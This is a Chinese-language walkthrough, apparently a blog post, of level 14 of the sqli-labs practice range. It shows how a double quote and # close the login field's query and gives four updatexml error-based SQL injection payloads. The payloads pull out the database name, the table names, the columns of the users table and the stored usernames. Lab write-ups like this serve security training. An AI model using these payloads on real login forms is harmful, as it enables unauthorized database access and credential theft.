sqli-labs靶场第十四关

目录

1:分析

找闭合符:

2:开始注入

报错注入:

注入数据库名:

注入表名:

注入列名:

注入具体值:


1:分析

        经过我们的实验发现当我们输入的密码后面存在双引号时会报错,由此可以发现注入点在此处。

找闭合符:

当我们输入正确的账号并在后面加上#后,可以成功登录,由此我们可以使用#进行闭合。

2:开始注入

        因为当我们输入的sql语句出错时web界面会将错误爆出来,所以我们可以使用报错注入的方式进行注入。

        在账号输入栏进行注入。

           

报错注入:

注入数据库名:

admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

注入表名:

admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

注入列名:

通过观察可以知道最有可能存放敏感信息的表为users表,所以我们将users表的信息注入出来。

admin " and  updatexml(1,concat(0x7e,(select  group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x7e),1) #

注入具体值:

        我们已经注入出来了列名,现在我们将username和password注入出来。

admin" and updatexml(1,substr(concat(0x7e,(select group_concat(username) from users),0x7e),1,32),1)#

到此我们就成功的注入了,想要注入其他的值只需要重复上面的操作即可。

             

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值